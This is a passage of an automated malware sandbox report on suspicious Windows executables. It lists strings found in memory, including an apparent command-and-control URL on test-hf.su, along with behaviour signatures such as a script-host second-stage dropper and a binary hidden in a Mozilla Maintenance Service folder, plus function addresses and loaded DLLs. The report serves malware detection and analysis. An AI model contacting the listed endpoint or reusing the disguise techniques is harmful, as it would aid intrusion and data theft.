                          Source: vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3259059706.000000000547C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://h172956.srv11.test-hf.su/providerVmjs_PollAuthapiBasecdndownloads.php(gI
                          Source: vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3259059706.0000000002B1B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://h172956.srv11.test-hf.su8
                          Source: hyperbrokerhostNetsvc.exe, 00000006.00000002.2304908980.0000000003BB7000.00000004.00000800.00020000.00000000.sdmp, vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3259059706.0000000002B1B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                          Source: vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3355893743.0000000013434000.00000004.00000800.00020000.00000000.sdmp, vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3355893743.0000000014F55000.00000004.00000800.00020000.00000000.sdmp, vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3355893743.0000000014FAC000.00000004.00000800.00020000.00000000.sdmp, vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3355893743.00000000150EC000.00000004.00000800.00020000.00000000.sdmp, vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3355893743.0000000013F6D000.00000004.00000800.00020000.00000000.sdmp, vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3355893743.000000001472A000.00000004.00000800.00020000.00000000.sdmp, vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3355893743.00000000133DC000.00000004.00000800.00020000.00000000.sdmp, vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3355893743.0000000012B72000.00000004.00000800.00020000.00000000.sdmp, 1A3xZKobjV.12.dr, yLbRMBQSN5.12.dr, gvAKM0fLhk.12.dr, iErAbyc3M5.12.dr, 8yAXZKSYXg.12.dr, pwL7dW8qS0.12.dr, 8J9Zbopzzz.12.dr, D3mg9YhQBx.12.dr, EoXjdnWCT9.12.dr, B9jB8Guobv.12.dr, yK7ksGTIPk.12.dr, PQay6onHRJ.12.dr, s3rECp1tL8.12.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                          Source: vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3355893743.0000000013434000.00000004.00000800.00020000.00000000.sdmp, vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3355893743.0000000014F55000.00000004.00000800.00020000.00000000.sdmp, vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3355893743.0000000014FAC000.00000004.00000800.00020000.00000000.sdmp, vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3355893743.00000000150EC000.00000004.00000800.00020000.00000000.sdmp, vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3355893743.0000000013F6D000.00000004.00000800.00020000.00000000.sdmp, vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3355893743.000000001472A000.00000004.00000800.00020000.00000000.sdmp, vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3355893743.00000000133DC000.00000004.00000800.00020000.00000000.sdmp, vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3355893743.0000000012B72000.00000004.00000800.00020000.00000000.sdmp, 1A3xZKobjV.12.dr, yLbRMBQSN5.12.dr, gvAKM0fLhk.12.dr, iErAbyc3M5.12.dr, 8yAXZKSYXg.12.dr, pwL7dW8qS0.12.dr, 8J9Zbopzzz.12.dr, D3mg9YhQBx.12.dr, EoXjdnWCT9.12.dr, B9jB8Guobv.12.dr, yK7ksGTIPk.12.dr, PQay6onHRJ.12.dr, s3rECp1tL8.12.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                          Source: vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3355893743.0000000013434000.00000004.00000800.00020000.00000000.sdmp, vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3355893743.0000000014F55000.00000004.00000800.00020000.00000000.sdmp, vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3355893743.0000000014FAC000.00000004.00000800.00020000.00000000.sdmp, vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3355893743.00000000150EC000.00000004.00000800.00020000.00000000.sdmp, vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3355893743.0000000013F6D000.00000004.00000800.00020000.00000000.sdmp, vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3355893743.000000001472A000.00000004.00000800.00020000.00000000.sdmp, vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3355893743.00000000133DC000.00000004.00000800.00020000.00000000.sdmp, vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3355893743.0000000012B72000.00000004.00000800.00020000.00000000.sdmp, 1A3xZKobjV.12.dr, yLbRMBQSN5.12.dr, gvAKM0fLhk.12.dr, iErAbyc3M5.12.dr, 8yAXZKSYXg.12.dr, pwL7dW8qS0.12.dr, 8J9Zbopzzz.12.dr, D3mg9YhQBx.12.dr, EoXjdnWCT9.12.dr, B9jB8Guobv.12.dr, yK7ksGTIPk.12.dr, PQay6onHRJ.12.dr, s3rECp1tL8.12.drString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                          Source: vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3355893743.0000000013434000.00000004.00000800.00020000.00000000.sdmp, vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3355893743.0000000014F55000.00000004.00000800.00020000.00000000.sdmp, vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3355893743.0000000014FAC000.00000004.00000800.00020000.00000000.sdmp, vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3355893743.00000000150EC000.00000004.00000800.00020000.00000000.sdmp, vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3355893743.0000000013F6D000.00000004.00000800.00020000.00000000.sdmp, vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3355893743.000000001472A000.00000004.00000800.00020000.00000000.sdmp, vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3355893743.00000000133DC000.00000004.00000800.00020000.00000000.sdmp, vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3355893743.0000000012B72000.00000004.00000800.00020000.00000000.sdmp, 1A3xZKobjV.12.dr, yLbRMBQSN5.12.dr, gvAKM0fLhk.12.dr, iErAbyc3M5.12.dr, 8yAXZKSYXg.12.dr, pwL7dW8qS0.12.dr, 8J9Zbopzzz.12.dr, D3mg9YhQBx.12.dr, EoXjdnWCT9.12.dr, B9jB8Guobv.12.dr, yK7ksGTIPk.12.dr, PQay6onHRJ.12.dr, s3rECp1tL8.12.drString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                          Source: vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3355893743.0000000013434000.00000004.00000800.00020000.00000000.sdmp, vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3355893743.0000000014F55000.00000004.00000800.00020000.00000000.sdmp, vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3355893743.0000000014FAC000.00000004.00000800.00020000.00000000.sdmp, vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3355893743.00000000150EC000.00000004.00000800.00020000.00000000.sdmp, vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3355893743.0000000013F6D000.00000004.00000800.00020000.00000000.sdmp, vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3355893743.000000001472A000.00000004.00000800.00020000.00000000.sdmp, vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3355893743.00000000133DC000.00000004.00000800.00020000.00000000.sdmp, vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3355893743.0000000012B72000.00000004.00000800.00020000.00000000.sdmp, 1A3xZKobjV.12.dr, yLbRMBQSN5.12.dr, gvAKM0fLhk.12.dr, iErAbyc3M5.12.dr, 8yAXZKSYXg.12.dr, pwL7dW8qS0.12.dr, 8J9Zbopzzz.12.dr, D3mg9YhQBx.12.dr, EoXjdnWCT9.12.dr, B9jB8Guobv.12.dr, yK7ksGTIPk.12.dr, PQay6onHRJ.12.dr, s3rECp1tL8.12.drString found in binary or memory: https://duckduckgo.com/ac/?q=
                          Source: vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3355893743.0000000013434000.00000004.00000800.00020000.00000000.sdmp, vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3355893743.0000000014F55000.00000004.00000800.00020000.00000000.sdmp, vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3355893743.0000000014FAC000.00000004.00000800.00020000.00000000.sdmp, vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3355893743.00000000150EC000.00000004.00000800.00020000.00000000.sdmp, vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3355893743.0000000013F6D000.00000004.00000800.00020000.00000000.sdmp, vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3355893743.000000001472A000.00000004.00000800.00020000.00000000.sdmp, vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3355893743.00000000133DC000.00000004.00000800.00020000.00000000.sdmp, vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3355893743.0000000012B72000.00000004.00000800.00020000.00000000.sdmp, 1A3xZKobjV.12.dr, yLbRMBQSN5.12.dr, gvAKM0fLhk.12.dr, iErAbyc3M5.12.dr, 8yAXZKSYXg.12.dr, pwL7dW8qS0.12.dr, 8J9Zbopzzz.12.dr, D3mg9YhQBx.12.dr, EoXjdnWCT9.12.dr, B9jB8Guobv.12.dr, yK7ksGTIPk.12.dr, PQay6onHRJ.12.dr, s3rECp1tL8.12.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
                          Source: vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3355893743.0000000013434000.00000004.00000800.00020000.00000000.sdmp, vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3355893743.0000000014F55000.00000004.00000800.00020000.00000000.sdmp, vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3355893743.0000000014FAC000.00000004.00000800.00020000.00000000.sdmp, vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3355893743.00000000150EC000.00000004.00000800.00020000.00000000.sdmp, vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3355893743.0000000013F6D000.00000004.00000800.00020000.00000000.sdmp, vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3355893743.000000001472A000.00000004.00000800.00020000.00000000.sdmp, vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3355893743.00000000133DC000.00000004.00000800.00020000.00000000.sdmp, vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3355893743.0000000012B72000.00000004.00000800.00020000.00000000.sdmp, 1A3xZKobjV.12.dr, yLbRMBQSN5.12.dr, gvAKM0fLhk.12.dr, iErAbyc3M5.12.dr, 8yAXZKSYXg.12.dr, pwL7dW8qS0.12.dr, 8J9Zbopzzz.12.dr, D3mg9YhQBx.12.dr, EoXjdnWCT9.12.dr, B9jB8Guobv.12.dr, yK7ksGTIPk.12.dr, PQay6onHRJ.12.dr, s3rECp1tL8.12.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                          Source: vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3355893743.0000000013434000.00000004.00000800.00020000.00000000.sdmp, vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3355893743.0000000014F55000.00000004.00000800.00020000.00000000.sdmp, vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3355893743.0000000014FAC000.00000004.00000800.00020000.00000000.sdmp, vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3355893743.00000000150EC000.00000004.00000800.00020000.00000000.sdmp, vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3355893743.0000000013F6D000.00000004.00000800.00020000.00000000.sdmp, vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3355893743.000000001472A000.00000004.00000800.00020000.00000000.sdmp, vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3355893743.00000000133DC000.00000004.00000800.00020000.00000000.sdmp, vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3355893743.0000000012B72000.00000004.00000800.00020000.00000000.sdmp, 1A3xZKobjV.12.dr, yLbRMBQSN5.12.dr, gvAKM0fLhk.12.dr, iErAbyc3M5.12.dr, 8yAXZKSYXg.12.dr, pwL7dW8qS0.12.dr, 8J9Zbopzzz.12.dr, D3mg9YhQBx.12.dr, EoXjdnWCT9.12.dr, B9jB8Guobv.12.dr, yK7ksGTIPk.12.dr, PQay6onHRJ.12.dr, s3rECp1tL8.12.drString found in binary or memory: https://www.ecosia.org/newtab/
                          Source: vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3355893743.0000000013434000.00000004.00000800.00020000.00000000.sdmp, vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3355893743.0000000014F55000.00000004.00000800.00020000.00000000.sdmp, vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3355893743.0000000014FAC000.00000004.00000800.00020000.00000000.sdmp, vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3355893743.00000000150EC000.00000004.00000800.00020000.00000000.sdmp, vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3355893743.0000000013F6D000.00000004.00000800.00020000.00000000.sdmp, vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3355893743.000000001472A000.00000004.00000800.00020000.00000000.sdmp, vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3355893743.00000000133DC000.00000004.00000800.00020000.00000000.sdmp, vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3355893743.0000000012B72000.00000004.00000800.00020000.00000000.sdmp, 1A3xZKobjV.12.dr, yLbRMBQSN5.12.dr, gvAKM0fLhk.12.dr, iErAbyc3M5.12.dr, 8yAXZKSYXg.12.dr, pwL7dW8qS0.12.dr, 8J9Zbopzzz.12.dr, D3mg9YhQBx.12.dr, EoXjdnWCT9.12.dr, B9jB8Guobv.12.dr, yK7ksGTIPk.12.dr, PQay6onHRJ.12.dr, s3rECp1tL8.12.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior

                          System Summary

                          barindex
                          Windows Scripting host queries suspicious COM object (likely to drop second stage)
                          Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeProcess Stats: CPU usage > 49%
                          Source: C:\Users\user\Desktop\hT7clR9Gz2.exeCode function: 0_2_007C6FAA: __EH_prolog,_wcslen,_wcslen,CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,0_2_007C6FAA
                          Source: C:\Users\user\Desktop\hT7clR9Gz2.exeCode function: 0_2_007C848E0_2_007C848E
                          Source: C:\Users\user\Desktop\hT7clR9Gz2.exeCode function: 0_2_007D6CDC0_2_007D6CDC
                          Source: C:\Users\user\Desktop\hT7clR9Gz2.exeCode function: 0_2_007C40FE0_2_007C40FE
                          Source: C:\Users\user\Desktop\hT7clR9Gz2.exeCode function: 0_2_007D00B70_2_007D00B7
                          Source: C:\Users\user\Desktop\hT7clR9Gz2.exeCode function: 0_2_007D40880_2_007D4088
                          Source: C:\Users\user\Desktop\hT7clR9Gz2.exeCode function: 0_2_007D71530_2_007D7153
                          Source: C:\Users\user\Desktop\hT7clR9Gz2.exeCode function: 0_2_007E51C90_2_007E51C9
                          Source: C:\Users\user\Desktop\hT7clR9Gz2.exeCode function: 0_2_007C32F70_2_007C32F7
                          Source: C:\Users\user\Desktop\hT7clR9Gz2.exeCode function: 0_2_007D62CA0_2_007D62CA
                          Source: C:\Users\user\Desktop\hT7clR9Gz2.exeCode function: 0_2_007D43BF0_2_007D43BF
                          Source: C:\Users\user\Desktop\hT7clR9Gz2.exeCode function: 0_2_007CF4610_2_007CF461
                          Source: C:\Users\user\Desktop\hT7clR9Gz2.exeCode function: 0_2_007ED4400_2_007ED440
                          Source: C:\Users\user\Desktop\hT7clR9Gz2.exeCode function: 0_2_007CC4260_2_007CC426
                          Source: C:\Users\user\Desktop\hT7clR9Gz2.exeCode function: 0_2_007D77EF0_2_007D77EF
                          Source: C:\Users\user\Desktop\hT7clR9Gz2.exeCode function: 0_2_007C286B0_2_007C286B
                          Source: C:\Users\user\Desktop\hT7clR9Gz2.exeCode function: 0_2_007ED8EE0_2_007ED8EE
                          Source: C:\Users\user\Desktop\hT7clR9Gz2.exeCode function: 0_2_007F19F40_2_007F19F4
                          Source: C:\Users\user\Desktop\hT7clR9Gz2.exeCode function: 0_2_007CE9B70_2_007CE9B7
                          Source: C:\Users\user\Desktop\hT7clR9Gz2.exeCode function: 0_2_007D3E0B0_2_007D3E0B
                          Source: C:\Users\user\Desktop\hT7clR9Gz2.exeCode function: 0_2_007CEFE20_2_007CEFE2
                          Source: C:\Users\user\Desktop\hT7clR9Gz2.exeCode function: 0_2_007E4F9A0_2_007E4F9A
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeCode function: 6_2_00007FF848F10DA86_2_00007FF848F10DA8
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeCode function: 6_2_00007FF8490C39FA6_2_00007FF8490C39FA
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeCode function: 6_2_00007FF8490C50FA6_2_00007FF8490C50FA
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeCode function: 6_2_00007FF8490C69786_2_00007FF8490C6978
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeCode function: 6_2_00007FF8490C51F26_2_00007FF8490C51F2
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeCode function: 6_2_00007FF8490C637D6_2_00007FF8490C637D
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeCode function: 6_2_00007FF8490C63F46_2_00007FF8490C63F4
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeCode function: 6_2_00007FF8490C4EBF6_2_00007FF8490C4EBF
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeCode function: 6_2_00007FF8490C4FFB6_2_00007FF8490C4FFB
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeCode function: 6_2_00007FF8490C67FB6_2_00007FF8490C67FB
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeCode function: 6_2_00007FF8490B00F06_2_00007FF8490B00F0
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeCode function: 12_2_00007FF848F10DA812_2_00007FF848F10DA8
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeCode function: 12_2_00007FF848F2B9FD12_2_00007FF848F2B9FD
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeCode function: 12_2_00007FF848F2CF4A12_2_00007FF848F2CF4A
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeCode function: 12_2_00007FF848F59E1D12_2_00007FF848F59E1D
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeCode function: 12_2_00007FF848F69FD012_2_00007FF848F69FD0
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeCode function: 12_2_00007FF8490C6A0512_2_00007FF8490C6A05
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeCode function: 12_2_00007FF8490C521A12_2_00007FF8490C521A
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeCode function: 12_2_00007FF8490C6A1D12_2_00007FF8490C6A1D
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeCode function: 12_2_00007FF8490C50FA12_2_00007FF8490C50FA
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeCode function: 12_2_00007FF8490C69AD12_2_00007FF8490C69AD
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeCode function: 12_2_00007FF8490C637D12_2_00007FF8490C637D
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeCode function: 12_2_00007FF8490C63F412_2_00007FF8490C63F4
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeCode function: 12_2_00007FF8490C4EBF12_2_00007FF8490C4EBF
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeCode function: 12_2_00007FF8490C4FFB12_2_00007FF8490C4FFB
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeCode function: 12_2_00007FF8490B00F012_2_00007FF8490B00F0
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeCode function: 12_2_00007FF8490CBEAF12_2_00007FF8490CBEAF
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeCode function: 12_2_00007FF8490CE7CD12_2_00007FF8490CE7CD
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeCode function: 12_2_00007FF8490D466812_2_00007FF8490D4668
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeCode function: 12_2_00007FF8490CEC1012_2_00007FF8490CEC10
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeCode function: 12_2_00007FF8490D402012_2_00007FF8490D4020
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeCode function: 12_2_00007FF8495C9AE212_2_00007FF8495C9AE2
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeCode function: 12_2_00007FF8495C868A12_2_00007FF8495C868A
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeCode function: 12_2_00007FF8495D4CBB12_2_00007FF8495D4CBB
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeCode function: 12_2_00007FF8495C7F0D12_2_00007FF8495C7F0D
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeCode function: 12_2_00007FF8496F67A312_2_00007FF8496F67A3
                          Source: Joe Sandbox ViewDropped File: C:\Users\user\Desktop\AyILZeLM.log 4DBA0293B2BA9478EC0738BAD92F0E56CB7CF800B0CA4FDA8261EE2C0C91E217
                          Source: C:\Users\user\Desktop\hT7clR9Gz2.exeCode function: String function: 007DF5F0 appears 31 times
                          Source: C:\Users\user\Desktop\hT7clR9Gz2.exeCode function: String function: 007DEC50 appears 56 times
                          Source: C:\Users\user\Desktop\hT7clR9Gz2.exeCode function: String function: 007DEB78 appears 39 times
                          Source: C:\Users\user\Desktop\hT7clR9Gz2.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dllJump to behavior
                          Source: C:\Users\user\Desktop\hT7clR9Gz2.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dllJump to behavior
                          Source: C:\Users\user\Desktop\hT7clR9Gz2.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dllJump to behavior
                          Source: C:\Users\user\Desktop\hT7clR9Gz2.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dllJump to behavior
                          Source: C:\Users\user\Desktop\hT7clR9Gz2.exeSection loaded: <pi-ms-win-core-localization-l1-2-1.dllJump to behavior
                          Source: C:\Users\user\Desktop\hT7clR9Gz2.exeSection loaded: version.dllJump to behavior
                          Source: C:\Users\user\Desktop\hT7clR9Gz2.exeSection loaded: dxgidebug.dllJump to behavior
                          Source: C:\Users\user\Desktop\hT7clR9Gz2.exeSection loaded: sfc_os.dllJump to behavior
                          Source: C:\Users\user\Desktop\hT7clR9Gz2.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Users\user\Desktop\hT7clR9Gz2.exeSection loaded: rsaenh.dllJump to behavior
                          Source: C:\Users\user\Desktop\hT7clR9Gz2.exeSection loaded: uxtheme.dllJump to behavior
                          Source: C:\Users\user\Desktop\hT7clR9Gz2.exeSection loaded: dwmapi.dllJump to behavior
                          Source: C:\Users\user\Desktop\hT7clR9Gz2.exeSection loaded: cryptbase.dllJump to behavior
                          Source: C:\Users\user\Desktop\hT7clR9Gz2.exeSection loaded: riched20.dllJump to behavior
                          Source: C:\Users\user\Desktop\hT7clR9Gz2.exeSection loaded: usp10.dllJump to behavior
                          Source: C:\Users\user\Desktop\hT7clR9Gz2.exeSection loaded: msls31.dllJump to behavior
                          Source: C:\Users\user\Desktop\hT7clR9Gz2.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Users\user\Desktop\hT7clR9Gz2.exeSection loaded: windowscodecs.dllJump to behavior
                          Source: C:\Users\user\Desktop\hT7clR9Gz2.exeSection loaded: textshaping.dllJump to behavior
                          Source: C:\Users\user\Desktop\hT7clR9Gz2.exeSection loaded: textinputframework.dllJump to behavior
                          Source: C:\Users\user\Desktop\hT7clR9Gz2.exeSection loaded: coreuicomponents.dllJump to behavior
                          Source: C:\Users\user\Desktop\hT7clR9Gz2.exeSection loaded: coremessaging.dllJump to behavior
                          Source: C:\Users\user\Desktop\hT7clR9Gz2.exeSection loaded: ntmarta.dllJump to behavior
                          Source: C:\Users\user\Desktop\hT7clR9Gz2.exeSection loaded: wintypes.dllJump to behavior
                          Source: C:\Users\user\Desktop\hT7clR9Gz2.exeSection loaded: wintypes.dllJump to behavior
                          Source: C:\Users\user\Desktop\hT7clR9Gz2.exeSection loaded: wintypes.dllJump to behavior
                          Source: C:\Users\user\Desktop\hT7clR9Gz2.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Users\user\Desktop\hT7clR9Gz2.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Users\user\Desktop\hT7clR9Gz2.exeSection loaded: propsys.dllJump to behavior
                          Source: C:\Users\user\Desktop\hT7clR9Gz2.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\Users\user\Desktop\hT7clR9Gz2.exeSection loaded: edputil.dllJump to behavior
                          Source: C:\Users\user\Desktop\hT7clR9Gz2.exeSection loaded: urlmon.dllJump to behavior
                          Source: C:\Users\user\Desktop\hT7clR9Gz2.exeSection loaded: iertutil.dllJump to behavior
                          Source: C:\Users\user\Desktop\hT7clR9Gz2.exeSection loaded: srvcli.dllJump to behavior
                          Source: C:\Users\user\Desktop\hT7clR9Gz2.exeSection loaded: netutils.dllJump to behavior
                          Source: C:\Users\user\Desktop\hT7clR9Gz2.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                          Source: C:\Users\user\Desktop\hT7clR9Gz2.exeSection loaded: policymanager.dllJump to behavior
                          Source: C:\Users\user\Desktop\hT7clR9Gz2.exeSection loaded: msvcp110_win.dllJump to behavior
                          Source: C:\Users\user\Desktop\hT7clR9Gz2.exeSection loaded: appresolver.dllJump to behavior
                          Source: C:\Users\user\Desktop\hT7clR9Gz2.exeSection loaded: bcp47langs.dllJump to behavior
                          Source: C:\Users\user\Desktop\hT7clR9Gz2.exeSection loaded: slc.dllJump to behavior
                          Source: C:\Users\user\Desktop\hT7clR9Gz2.exeSection loaded: userenv.dllJump to behavior
